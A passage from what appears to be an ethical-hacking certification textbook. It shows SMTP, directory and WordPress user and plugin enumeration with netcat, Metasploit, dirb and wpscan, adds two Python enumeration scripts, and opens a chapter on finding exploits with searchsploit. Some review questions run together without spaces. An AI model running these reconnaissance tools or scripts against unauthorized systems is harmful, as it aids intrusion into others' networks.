root@kali:~# nc 192.168.86.52 25
220 bobbie.lan ESMTP Postfix (Ubuntu)
EHLO blah.com
250-bobbie.lan
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8
MAIL From: [email protected]
250 2.1.0 Ok
RCPT To: [email protected]
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
From: Goober
To: Someone
Date: today
Subject: Hi

Nothing really to say.
.
250 2.0.0 Ok: queued as 33471301389

Once you initiate the conversation with EHLO, you will get a list of the capabilities offered by the server (the older HELO greeting only gets a bare 250 in reply, with no capability list). There are a couple of capabilities in SMTP that we can use to enumerate users or at least email addresses. One of them you can see is VRFY, which can be used to verify users. Not all mail servers will have this feature enabled, since it can be used to identify legitimate users or email addresses. That means it can be used by attackers as well as spammers. Here you can see an example of the use of VRFY against a local mail server running Postfix, which has VRFY enabled by default.

Testing VRFY

root@kali:~# nc 192.168.86.52 25
220 bobbie.lan ESMTP Postfix (Ubuntu)
EHLO blah.com
250-bobbie.lan
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8
VRFY [email protected]
252 2.0.0 [email protected]
VRFY [email protected]
252 2.0.0 [email protected]
VRFY root
252 2.0.0 root

We don't get anything back from our attempts except a status code. There is no text indicating what the server thinks of our request. That means we need to look up the numeric value we get. Unlike the earlier case, where we got 250, which means success, this time we got a status 252. This means that the address can't be verified but the server will attempt to deliver the message. While VRFY is enabled on this server, we don't get a lot of useful information. On top of that, running through this manually is very time-consuming.

Metasploit again to the rescue, though. The module smtp_enum will take a wordlist and do automatically what you saw done manually earlier. It will run through all the users in the wordlist, checking to see whether each user exists. There are two ways to test whether users exist: either the VRFY command or a MAIL FROM followed by an RCPT TO for each candidate address (there is no "MAIL TO" verb in SMTP; the recipient check is RCPT TO). In the following listing, you can see the results of a run against the same server. This is using the default wordlist that comes with Metasploit that has a list of common Unix usernames (unix_users.txt).

smtp_enum Run

msf auxiliary(scanner/smtp/smtp_enum) > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.86.52/32
RHOSTS => 192.168.86.52/32
msf auxiliary(scanner/smtp/smtp_enum) > run
[*] 192.168.86.52:25 - 192.168.86.52:25 Banner: 220 bobbie.lan ESMTP Postfix (Ubuntu)
[+] 192.168.86.52:25 - 192.168.86.52:25 Users found: , backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, syslog, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

You'll notice that there are a lot of users listed as being found by this module. Based on the fact that the VRFY command returned a 252 and the users are ones that exist on this system, the module isn't using VRFY. Instead, it's using RCPT TO. Users that don't exist will result in a 550 status code. Users that do exist will return a 250 when mail is attempted to that user. Based on the results of this, the module returns valid usernames, since out of the 112 users in the list, only 21 users were identified.

There is another command that can be used on SMTP servers, though it is targeted at mailing lists. If you find a mailing list address that belongs to a domain, you may be able to use EXPN to expand the mailing list, which means identifying the email addresses that are on that mailing list. Whether a server offers EXPN is advertised in the capability list it returns to EHLO, the extended (ESMTP) form of HELO; many mail servers disable EXPN or don't implement it at all, so check the EHLO response before trying it.

Web-Based Enumeration

As far as enumeration goes, there may be a couple of things we want to look at on web servers. The first is to identify directories available in a website. There are a lot of different ways to do this, especially if you have access to web application testing tools. Even if you don't or aren't familiar with using them, there are simple ways of checking. All you need is a wordlist that can provide potential directory names and a tool that can make requests to a web server based on those words, appending each word to a base Uniform Resource Locator (URL). Here, you can see the use of the program dirb, which includes its own wordlist of common directory names. This was run against a web server on my own network that had the WordPress distribution unzipped into the base web directory.

dirb Directory Testing

root@kali:~# dirb http://192.168.86.52/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Jan  4 19:38:36 2021
URL_BASE: http://192.168.86.52/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.86.52/ ----
+ http://192.168.86.52/index.php (CODE:200|SIZE:418)
==> DIRECTORY: http://192.168.86.52/wp-admin/
==> DIRECTORY: http://192.168.86.52/wp-content/
==> DIRECTORY: http://192.168.86.52/wp-includes/
+ http://192.168.86.52/xmlrpc.php (CODE:200|SIZE:3065)

---- Entering directory: http://192.168.86.52/wp-admin/ ----
+ http://192.168.86.52/wp-admin/admin.php (CODE:200|SIZE:10531)
==> DIRECTORY: http://192.168.86.52/wp-admin/css/
==> DIRECTORY: http://192.168.86.52/wp-admin/images/
==> DIRECTORY: http://192.168.86.52/wp-admin/includes/
+ http://192.168.86.52/wp-admin/index.php (CODE:200|SIZE:7265)
==> DIRECTORY: http://192.168.86.52/wp-admin/js/
==> DIRECTORY: http://192.168.86.52/wp-admin/maint/
==> DIRECTORY: http://192.168.86.52/wp-admin/network/
==> DIRECTORY: http://192.168.86.52/wp-admin/user/

What we've done so far is to check known or expected directories on a web server. Using a wordlist doesn't guarantee that you are going to identify all directories that are available on the server. If a directory isn't in the wordlist, it won't be identified. We can turn to another tool to help with fuzzing directory names, meaning generating names dynamically based on a set of rules. You may expect at this point that we would turn to Metasploit because it's so useful. You'd be correct. We can use the brute_dirs module. Using this module, you set a format for what a directory name could or should look like and the module will run through all possible names that match the format. Here you can see the options available for the module, followed by a format set. We're going to be testing against all words with lowercase characters whose lengths are between one and eight characters. Be aware of what that format asks for: every lowercase string of one to eight letters is 26 + 26^2 + ... + 26^8, roughly 2 × 10^11 (217 billion) requests, which no engagement can afford. In practice you cap the length at three or four characters or constrain the format (for example, fixed prefixes plus digits) so the run finishes in hours rather than decades.

brute_dirs Metasploit Module

msf > use auxiliary/scanner/http/brute_dirs
msf auxiliary(scanner/http/brute_dirs) > info

       Name: HTTP Directory Brute Force Scanner
     Module: auxiliary/scanner/http/brute_dirs
    License: BSD License
       Rank: Normal

Provided by:
  et

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FORMAT   a,aa,aaa         yes       The expected directory format (a alpha, d digit, A upper alpha)
  PATH     /                yes       The path to identify directories
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS   192.168.86.52    yes       The target address range or CIDR identifier
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  THREADS  1                yes       The number of concurrent threads
  VHOST                     no        HTTP server virtual host

Description:
  This module identifies the existence of interesting directories by brute forcing the name in a given directory path.

msf auxiliary(scanner/http/brute_dirs) > set FORMAT a,aa,aaa,aaaa,aaaaa,aaaaaa,aaaaaaa,aaaaaaaa
FORMAT => a,aa,aaa,aaaa,aaaaa,aaaaaa,aaaaaaa,aaaaaaaa
msf auxiliary(scanner/http/brute_dirs) > run
[*] Using code '404' as not found.

Metasploit, as always, has a large number of modules that can be used for web-based enumeration beyond just identifying directories on the web server. As you start working with websites and, more specifically, web applications, you will run across a lot of open source applications that are well known because they are so commonly used. As an example, you may find a WordPress installation. Again using Metasploit, we can enumerate the users in the WordPress installation. The wordpress_login_enum module can take a user file or a password file, or you could provide a single username with a password file or a single password with a username file. There are a number of other options that can be set in the module, providing a lot of capabilities. Here you can see the module run against a local installation of WordPress.

Enumerating Usernames in WordPress

msf auxiliary(scanner/http/wordpress_login_enum) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.86.52
RHOSTS => 192.168.86.52
msf auxiliary(scanner/http/wordpress_login_enum) > run
[*] / - WordPress Version 4.9.8 detected
[*] 192.168.86.52:80 - / - WordPress User-Enumeration - Running User Enumeration
[+] / - Found user 'kilroy' with id 1
[+] / - Usernames stored in: /root/.msf4/loot/20210104205530_default_192.168.86.52_wordpress.users_790698.txt
[*] 192.168.86.52:80 - / - WordPress User-Validation - Running User Validation
[*] 192.168.86.52:80 - [1/0] - / - WordPress Brute Force - Running Bruteforce
[*] / - Brute-forcing previously found accounts...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

You'll notice it makes reference to storing the username in a file in the home directory of the root user, which is the user under which msfconsole is running. Metasploit also stores this information in its database. Any time you want to check to see what you have grabbed in terms of information like credentials, you can run the command loot inside msfconsole. You can see the results of this command here.

Listing loot in msfconsole

msf auxiliary(scanner/http/wordpress_login_enum) > loot

Loot
====

host           service  type             name                               content     info  path
----           -------  ----             ----                               -------     ----  ----
192.168.86.52           wordpress.users  192.168.86.52_wordpress_users.txt  text/plain        /root/.msf4/loot/20210104205530_default_192.168.86.52_wordpress.users_790698.txt
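The module above, and the wpscan run that follows, recover usernames from places WordPress exposes them without authentication: the dc:creator element of the RSS feed, the /wp-json/wp/v2/users REST endpoint, and the redirect from /?author=N to /author/<slug>/. The following is an added example, not Metasploit's or wpscan's code, that collects users from all three sources through one fetch interface. The feed, REST response and redirect it runs against are constructed sample data modelled on the kilroy install shown on this page; http_fetch is a live fetcher with the same contract that you would substitute for sample_fetch against a real target.

```python
"""WordPress user enumeration from three unauthenticated sources.
Added example; every fetch callable returns (status, headers, body)."""
import json
import re
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

DC_NS = "{http://purl.org/dc/elements/1.1/}"
AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")


def users_from_rss(xml_text):
    """dc:creator in the feed is the author's display name, which equals the
    login unless the user changed it; duplicates across posts are collapsed."""
    root = ET.fromstring(xml_text)
    seen = []
    for el in root.iter(DC_NS + "creator"):
        name = (el.text or "").strip()
        if name and name not in seen:
            seen.append(name)
    return seen


def users_from_rest(json_text):
    """/wp-json/wp/v2/users lists users with published posts: id, slug, display name."""
    return [(u["id"], u["slug"], u.get("name", "")) for u in json.loads(json_text)]


def user_from_author_redirect(location):
    """/?author=N answers 301 to /author/<slug>/ when user N exists."""
    m = AUTHOR_RE.search(location or "")
    return m.group(1) if m else None


def enumerate_users(base, fetch, max_author_id=5):
    """Return {slug: set(sources)} so the report shows where each name leaked from."""
    found = {}

    def add(slug, source):
        found.setdefault(slug, set()).add(source)

    status, _, body = fetch(base + "/index.php/feed/")
    if status == 200:
        for name in users_from_rss(body):
            add(name, "rss")
    status, _, body = fetch(base + "/wp-json/wp/v2/users")
    if status == 200:
        for _uid, slug, _name in users_from_rest(body):
            add(slug, "rest-api")
    for i in range(1, max_author_id + 1):
        status, headers, _ = fetch(f"{base}/?author={i}")
        if status in (301, 302):
            slug = user_from_author_redirect(headers.get("Location"))
            if slug:
                add(slug, f"author-id-{i}")
    return found


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # surface the 301 so the Location header can be read


def http_fetch(url, timeout=10):
    """Live fetcher honouring the (status, headers, body) contract used above."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


# Constructed sample responses (not captured from the page's target).
BASE = "http://192.168.86.52"
SAMPLE_FEED = """<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel><title>Sample site</title>
<item><title>Hello world!</title><dc:creator><![CDATA[kilroy]]></dc:creator></item>
<item><title>Second post</title><dc:creator><![CDATA[kilroy]]></dc:creator></item>
</channel></rss>"""
SAMPLE_REST = '[{"id": 1, "name": "Kilroy", "slug": "kilroy", "link": "http://192.168.86.52/author/kilroy/"}]'
SAMPLE_RESPONSES = {
    BASE + "/index.php/feed/": (200, {}, SAMPLE_FEED),
    BASE + "/wp-json/wp/v2/users": (200, {}, SAMPLE_REST),
    BASE + "/?author=1": (301, {"Location": BASE + "/author/kilroy/"}, ""),
}


def sample_fetch(url):
    return SAMPLE_RESPONSES.get(url, (404, {}, ""))


if __name__ == "__main__":
    for slug, sources in enumerate_users(BASE, sample_fetch).items():
        print(slug, sorted(sources))
```

Recording the source alongside each name is what makes the finding actionable: the REST endpoint and the author redirect can be closed with configuration, whereas the feed leak goes away only when display names differ from logins.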
When it comes to WordPress, we don't have to rely on Metasploit. Again, we can rely on Kali Linux because it's freely available and easy to use, not to mention that there are hundreds of tools that are available. Kali comes with the program wpscan that can be used to enumerate not only users, but also themes and plugins. When it comes to a web application like WordPress, the plugins can also be useful to know about because they may also introduce vulnerabilities. They do include additional code, after all. In the following listing, you can see a run of wpscan, where we enumerate the plugins. You will also notice that while it was running, it detected the user that is configured.

Enumerating Plugins in WordPress

root@kali:~# wpscan --url http://192.168.86.52 --enumerate p
[WPScan ASCII-art banner]
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

[+] URL: http://192.168.86.52/
[+] Started: Sun Jan  3 21:20:59 2021

[+] Interesting header: LINK: ; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.29 (Ubuntu)
[+] XML-RPC Interface available under: http://192.168.86.52/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://192.168.86.52/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+--------+
| Name   |
+--------+
| kilroy |
+--------+
[!] Upload directory has directory listing enabled: http://192.168.86.52/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.86.52/wp-includes/

[+] Enumerating WordPress version ...
[+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers

[+] WordPress theme in use: twentyseventeen - v1.7

[+] Name: twentyseventeen - v1.7
 |  Latest version: 1.7 (up to date)
 |  Last updated: 2018-08-02T00:00:00.000Z
 |  Location: http://192.168.86.52/wp-content/themes/twentyseventeen/
 |  Readme: http://192.168.86.52/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://192.168.86.52/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating installed plugins (only ones marked as popular) ...

   Time: 00:00:00 (1494 / 1494) 100.00% Time: 00:00:00

[+] We found 5 plugins:

[+] Name: akismet - v4.0.8
 |  Latest version: 4.0.8 (up to date)
 |  Last updated: 2018-06-19T18:18:00.000Z
 |  Location: http://192.168.86.52/wp-content/plugins/akismet/
 |  Readme: http://192.168.86.52/wp-content/plugins/akismet/readme.txt

[+] Name: gutenberg - v3.6.1
 |  Last updated: 2018-08-17T15:50:00.000Z
 |  Location: http://192.168.86.52/wp-content/plugins/gutenberg/
 |  Readme: http://192.168.86.52/wp-content/plugins/gutenberg/readme.txt
 |  Changelog: http://192.168.86.52/wp-content/plugins/gutenberg/changelog.txt
[!] The version is out of date, the latest version is 3.6.2
[!] Directory listing is enabled: http://192.168.86.52/wp-content/plugins/gutenberg/

[+] Name: jetpack - v6.4.2
 |  Latest version: 6.4.2 (up to date)
 |  Last updated: 2018-08-10T14:33:00.000Z
 |  Location: http://192.168.86.52/wp-content/plugins/jetpack/
 |  Readme: http://192.168.86.52/wp-content/plugins/jetpack/readme.txt
 |  Changelog: http://192.168.86.52/wp-content/plugins/jetpack/changelog.txt
[!] Directory listing is enabled: http://192.168.86.52/wp-content/plugins/jetpack/

[+] Name: tablepress - v1.9
 |  Latest version: 1.9 (up to date)
 |  Last updated: 2017-12-03T19:57:00.000Z
 |  Location: http://192.168.86.52/wp-content/plugins/tablepress/
 |  Readme: http://192.168.86.52/wp-content/plugins/tablepress/readme.txt

[+] Name: wordfence - v7.1.10
 |  Latest version: 7.1.10 (up to date)
 |  Last updated: 2018-07-31T17:48:00.000Z
 |  Location: http://192.168.86.52/wp-content/plugins/wordfence/
 |  Readme: http://192.168.86.52/wp-content/plugins/wordfence/readme.txt

[+] Finished: Sun Jan  3 21:21:06 2021
[+] Elapsed time: 00:00:06
[+] Requests made: 1588
[+] Memory used: 103.09 MB
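Three of the checks in the wpscan output above are simple enough to reproduce by hand: the installed plugin version comes from the "Stable tag" line of the plugin's readme.txt, the out-of-date flag is a numeric comparison against the latest known release, and the directory-listing warning comes from requesting the plugin directory and recognising an index page. The following is an added example, not wpscan's code, that performs those three checks through the same fetch interface. The readme text and index page are constructed samples; the latest-version table holds the numbers wpscan printed above and is assumed current only for this demonstration (a real run would query the WordPress.org plugin API instead).

```python
"""Plugin version, out-of-date check and directory-listing check for a WordPress
plugin directory.  Added example; fetch returns (status, headers, body)."""
import re

STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*(\S+)", re.IGNORECASE | re.MULTILINE)
INDEX_OF_RE = re.compile(r"<title>\s*Index of\s", re.IGNORECASE)


def stable_tag(readme_text):
    """Version from the 'Stable tag:' line of readme.txt; 'trunk' carries no version."""
    m = STABLE_TAG_RE.search(readme_text or "")
    if not m or m.group(1).lower() == "trunk":
        return None
    return m.group(1)


def parse_version(v):
    """Numeric tuple so that 7.1.10 sorts after 7.1.9 (string comparison would not)."""
    parts = []
    for piece in v.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group(0)) if digits else 0)
    return tuple(parts)


def is_outdated(installed, latest):
    a, b = parse_version(installed), parse_version(latest)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def directory_listing_enabled(body):
    """Apache and nginx autoindex pages title themselves 'Index of /...'."""
    return bool(INDEX_OF_RE.search(body or ""))


def check_plugin(base, slug, fetch, latest_known):
    """Return the facts wpscan prints per plugin: version, latest, outdated, listing."""
    plugin_dir = f"{base}/wp-content/plugins/{slug}/"
    status, _, readme = fetch(plugin_dir + "readme.txt")
    version = stable_tag(readme) if status == 200 else None
    status, _, index = fetch(plugin_dir)
    listing = status == 200 and directory_listing_enabled(index)
    latest = latest_known.get(slug)
    return {
        "slug": slug,
        "version": version,
        "latest": latest,
        "outdated": bool(version and latest and is_outdated(version, latest)),
        "listing": listing,
    }


# Constructed samples.  LATEST_KNOWN holds the "latest version" values wpscan
# printed above; they are assumed current only for this demonstration.
BASE = "http://192.168.86.52"
SAMPLE_README = """=== Gutenberg ===
Contributors: (sample)
Tested up to: 4.9.8
Stable tag: 3.6.1
License: GPLv2 or later
"""
SAMPLE_INDEX = ("<html><head><title>Index of /wp-content/plugins/gutenberg</title>"
                "</head><body>...</body></html>")
SAMPLE_RESPONSES = {
    BASE + "/wp-content/plugins/gutenberg/readme.txt": (200, {}, SAMPLE_README),
    BASE + "/wp-content/plugins/gutenberg/": (200, {}, SAMPLE_INDEX),
}
LATEST_KNOWN = {"gutenberg": "3.6.2", "akismet": "4.0.8", "wordfence": "7.1.10"}


def sample_fetch(url):
    return SAMPLE_RESPONSES.get(url, (404, {}, ""))


if __name__ == "__main__":
    for slug in ("gutenberg", "akismet"):
        print(check_plugin(BASE, slug, sample_fetch, LATEST_KNOWN))
```

The version comparison is deliberately numeric: wordfence 7.1.10 is newer than 7.1.9, but a plain string comparison would call it older and produce a false "out of date" finding in the report.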
In addition to user and plugin enumeration, wpscan identified a couple of issues with the WordPress installation, so those can be used down the road. It also identified a header from the HTTP communication that it felt to be interesting because it included the name of the product as well as the version and the operating system. All of these are useful pieces of information to have. These aren't the only things we can enumerate when it comes to web applications. We could scan networks for different web applications or look to enumerate users. Looking for directories that are on the web server is also useful because it can help us identify applications as well as data that may be available.

Summary

Enumeration is the process of gathering a lot of information further up the network stack than just IP addresses and ports. At this point, we are moving up to the Application layer. We're looking for things like usernames, where we can find them, and network shares and any other footholds we may be able to gather. To accomplish this enumeration work, there are a number of protocols and tools that we can use. The first is nmap, because we need to go beyond just identifying open ports. We need to identify the services that are in use, including the software being used. One feature of nmap that is useful, especially in these circumstances, is its scripting capability. This includes, especially, all the scripts that are built into nmap. When it comes to nmap, there are scripts that can be used not only to probe services for additional details but to take advantage of the many enumeration capabilities.

One of the protocols we can spend time looking at is the SMB protocol. nmap includes a number of scripts that will probe systems that use SMB. This includes identifying shares that may be open as well as potentially users and other management-related information that can be accessed using SMB. SMB relies on RPCs. NFS, a file sharing protocol developed by Sun Microsystems, also uses RPC. We can use nmap to enumerate RPC services, since these services register dynamically with a mapping or registry service. Probing the RPC server will provide details about the programs and ports that are exporting RPC functionality. If the program is written in Java, it will use RMI instead of portmap or the Sun RPC protocol.

Another program you can use across a number of protocols for enumeration is Metasploit. Metasploit comes with lots of modules that will enumerate shares and users on SMB, services using Sun RPC, and a number of other protocols. If there is information that can be enumerated, Metasploit probably has a module that can be run. This includes modules that will enumerate users in mail servers over SMTP. You can also enumerate information using SNMP. Of course, when it comes to SNMP, you can also use tools like snmpwalk.

While Metasploit can be used across a lot of different protocols to look for different pieces of useful information, it is not the only tool you can use. There are built-in tools for gathering information from SMB, for example. You're more likely to find those tools on Windows systems, but you can also find tools on Linux systems, especially if you have Samba installed. Samba is a software package that implements the SMB protocol on Unix-like systems. There are also a lot of open source tools that can be used for different protocols. If you are okay with using Linux, Kali Linux is a distribution that includes hundreds of security-related tools.

As you are performing this enumeration, you should be taking notes so you have references when you are going forward. One advantage to using Metasploit, not to oversell this software, is that it uses a database backend, which will store a lot of information automatically. This is certainly true of services and ports but also of usernames that have been identified. This is not to say that Metasploit can be used to store every aspect of your engagement, but you can refer to details later by querying the Metasploit database as needed.

Review Questions

You can find the answers in the appendix.

1. What are RPCs primarily used for?
   A. Interprocess communications
   B. Interprocess semaphores
   C. Remote method invocation
   D. Process demand paging

2. What would you be trying to enumerate if you were to use enum4linux?
   A. Procedures
   B. Linux-based services
   C. Shares and/or users
   D. Memory utilization

3. How do you authenticate with SNMPv1?
   A. Username/password
   B. Hash
   C. Public string
   D. Community string

4. What SMTP command would you use to get the list of users in a mailing list?
   A. EXPD
   B. VRFY
   C. EXPN
   D. VRML

5. What type of enumeration would you use the utility dirb for?
   A. Directory listings
   B. Directory enumeration
   C. Brute-force dialing
   D. User directory analysis

6. What are data descriptions in SNMP called?
   A. Management-based information
   B. Data structure definition
   C. Extensible markup language
   D. Management information base

7. What is the process Java programs identify themselves to if they are sharing procedures over the network?
   A. RMI registry
   B. RMI mapper
   C. RMI database
   D. RMI process

8. You are working with a colleague, and you see them interacting with an email server using the VRFY command. What is it your colleague is doing?
   A. Verifying SMTP commands
   B. Verifying mailing lists
   C. Verifying email addresses
   D. Verifying the server config

9. What is the SMB protocol used for?
   A. Data transfers using NFS
   B. Data transfers on Windows systems
   C. Data transfers for email attachments
   D. Data transfers for Windows Registry updates

10. Which of these is a built-in program on Windows for gathering information using SMB?
   A. nmblookup
   B. smbclient
   C. Metasploit
   D. nbtstat

11. What status code will you get if your attempt to use the VRFY command fails?
   A. 550
   B. 501
   C. 250
   D. 200

12. What program would you use to enumerate services?
   A. smbclient
   B. Nmap
   C. enum4linux
   D. snmpwalk
13.WhatversionofSNMPintroducedencryptionanduser-­basedauthentication?A.1B.2C.2cD.314.WhichofthesecouldyouenumerateonaWordPresssiteusingwpscan?A.PluginsB.PostsC.AdministratorsD.Versions15.Whichofthesetoolsallowsyoutocreateyourownenumerationfunctionbasedonportsbeingidentifiedasopen?A.MetasploitB.nmapC.NetcatD.nbtstat16.WhatunderlyingfunctionalityisnecessarytoenableWindowsfilesharing?A.NetworkFileSystemB.CommonInternetFileSystemC.RemoteprocedurecallD.Remotemethodinvocation17.WhatistheIPC$shareusedfor?A.ProcesspipingB.InterprocessconstructionC.RemoteprocessmanagementD.Interprocesscommunication18.WhattooldoesaJavaprogramneedtousetoimplementremoteprocesscommunication?A.JREB.rmicC.rmirD.JDK261262 Chapter6  Enumeration■19.Whichofthesepassesobjectsbetweensystems?A.SunRPCB.SMBC.RMID.nmap20.Ifyouneededtoenumeratedataacrossmultipleservicesandalsostorethedataforretrievallater,whattoolwouldyouuse?A.MetasploitB.nmapC.RMID.PostgresChapter7SystemHackingTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Vulnerabilities✓✓Exploittools✓✓Programminglanguages✓✓Operatingenvironments✓✓Verificationprocedures✓✓TechnicalassessmentmethodsThisiswherewegettowhatmanypeoplethinkiswhat“hacking,”orpenetrationtesting,isallabout.Certainly,systemhackingisanimportantelement,sinceit’swhereyoudemonstratethatthevulnerabilitiesactuallyexist,butit’snot 
the only one. Penetration testing, or ethical hacking, isn't just about breaking into systems—looting and pillaging. Keep in mind that the objective is always to help organizations improve their security posture. Exploiting vulnerabilities to gain access to systems is one way of doing that. Breaking into a system demonstrates the existence of the vulnerability, and it also provides potential pathways to other systems.

With the end goal in mind, and with the list of vulnerabilities in place, we can start looking for exploits. There are a handful of ways to do that, some more effective than others. One method can be done directly on the system from which you are running your tests. Locating the exploits is essential to being able to run them against your target systems to gain access.

Once you gain access, you move on to post-exploitation activities. You'll want to grab passwords and attempt to crack those passwords. This does two things. First, it demonstrates that there are passwords that can be cracked—strong passwords shouldn't be crackable without taking an immense amount of time and computing resources. If you can easily crack a password, it isn't strong enough and should be changed. Second, usernames and passwords are credentials you can use on other systems.

Just getting into a system may not get you much. When you run an exploit, you only have the permissions that have been provided to the user the service is running as. Typically, this is a reduced set of permissions. As a result, you may not be able to do much of anything. At least, you may not be able to do much of anything without gaining a higher level of privileges. This means you need a local vulnerability, one that exists in software that can be accessed or run only when you are logged into the system. Running these privilege escalations, if they are successful, will gain you another level of information and access that you can make use of.

Attackers will generally try to obscure their existence in a system. If you are really working in a red-team capacity, where the operations teams at your target are being tested for their ability to detect and respond, you too will want to cover your tracks. There are several steps you may want to take to hide your existence. This may be especially true if there is evidence of your initial infiltration of the system.

This chapter, perhaps more than others, covers a range of techniques that are just the starting point. There are more tools in regular use than can be covered here. System exploitation is not a science, either. You can't just read a set of instructions on how to reliably break into a system. It is an art. It requires a lot of time working not only with tools but also understanding vulnerabilities and how they may be exploited. It often requires a reasonable understanding of system administration, meaning you need to know how to operate the systems you are trying to break into. While this aspect of ethical hacking is often thought of as the most fun, it requires a lot of time and effort to do well, and it's not necessarily the most important aspect.

When it comes to the MITRE ATT&CK Framework, the techniques covered in this chapter fall under Execution and Persistence. Between those two phases are 28 techniques. Most of those, 18, fall under Persistence. This demonstrates the idea that there is a lot to cover here, and we can't cover everything. It really requires a lot of work and exploration, though we'll cover the foundations. If this is what you want to do for a job, you will need to put in a lot of time to really understand all of these tools and techniques.

Searching for Exploits
You've done your enumeration and your scanning to identify vulnerabilities, so you have a list of vulnerabilities that seem promising. You need ways of exploiting the vulnerabilities, and even if you could, you just don't have the time to write exploits yourself. You may as well take advantage of the work of others to get exploits so you can clearly demonstrate the vulnerability. That's one of the primary reasons for running the exploit after all. You need to demonstrate that a vulnerability is exploitable for when you report to your customer/employer. Another reason to run the exploit is to gain an additional layer so you can pivot to other networks to look for more vulnerabilities.

Part of being an ethical hacker is making sure you have permission and are not doing any harm. However, the objective of any ethical hacker should be to improve security. This is an important point. Getting into a customer's network to take down as many systems as you can just to have done it without any path for the customer to improve their security posture isn't very ethical. Keep in mind that your goal is always to improve security and not just to see how much damage you can cause.

You may be wondering where you could possibly find a lot of exploits. One great resource is www.exploit-db.com. This is a site where researchers and developers post exploit code and proof-of-concept code that works against identified vulnerabilities. While often these exploits make their way into tools like Metasploit, they don't always. This may especially be true if the exploit is just a proof of concept that's not fully implemented and may not take the exploit to the end. If you take a look at Figure 7.1, you can see a list of the code for current exploits. What you see is just a list of remote exploits. In fairness, not all of these are exploits in the way you may think about exploits, if you are thinking of exploits as something that gives you a shell. At the top of the list, for example, you will see a link to a Python script that enumerates usernames on an OpenSSH 7.7 installation.

FIGURE 7.1 Remote Exploits list at www.exploit-db.com

What you see is just a single category of exploits. You'll also see web application exploits, denial-of-service exploits, and local exploits, which include privilege escalation exploits. While the remote exploits may seem sexier—after all, who doesn't love to pop a box?—there is so much more to exploiting systems than just getting in remotely. In fact, there are often far easier ways to infiltrate a network. At the time of this writing, there are nearly 44,000 exploits that have been archived at www.exploit-db.com. Much of what you will find here are scripts written in languages like Python. If you know Python, you can read them. Whatever the exploit is written in, make sure you are testing it in a safe place ahead of time. This will give you a clear understanding of what it is doing and the impact it is likely to have.

There may be an easier way to get to the exploits rather than opening a browser and going through the website. Kali Linux has the repository of exploits available, as well as a tool that can be used to search the repository from the command line. You don't have to be limited to just Kali, though. The entire repository is a Git repository that can be cloned and used anywhere. As an example, running ArchStrike over the top of Manjaro Linux, there is a package for the exploitdb repository, so you don't have to be running Kali. There are other distributions that include this package. You could also just clone their Git repository.

It's not just the repository you get, though. If that were the case, you'd have to find a way to locate the exploit you're looking for. Instead, there is a shell script that will locate files included in the repository that match your search parameters. As an example, in the following code listing, you can see a search for OpenSSH exploits. This was inspired by the current OpenSSH enumeration vulnerability. The program used is searchsploit. You can search for keywords, as shown, or you can specify where you are looking for the keyword, such as in the title. You may also do a case-sensitive search or do an exact match search. It will all depend on what you know about what you are looking for.

Finding Exploits with searchsploit

[email protected]$ searchsploit openssh
------------------------------------------------------------------------------------
 Exploit Title                          | Path (/usr/share/exploitdb-git/)
------------------------------------------------------------------------------------
Debian OpenSSH - (Authenticated) R     | exploits/linux/remote/6094.txt
Dropbear / OpenSSH Server - 'MAX_U     | exploits/multiple/dos/1572.pl
FreeBSD OpenSSH 3.5p1 - Remote Com     | exploits/freebsd/remote/17462.txt
Novell Netware 6.5 - OpenSSH Remot     | exploits/novell/dos/14866.txt
OpenSSH 1.2 - '.scp' File Create/O     | exploits/linux/remote/20253.sh
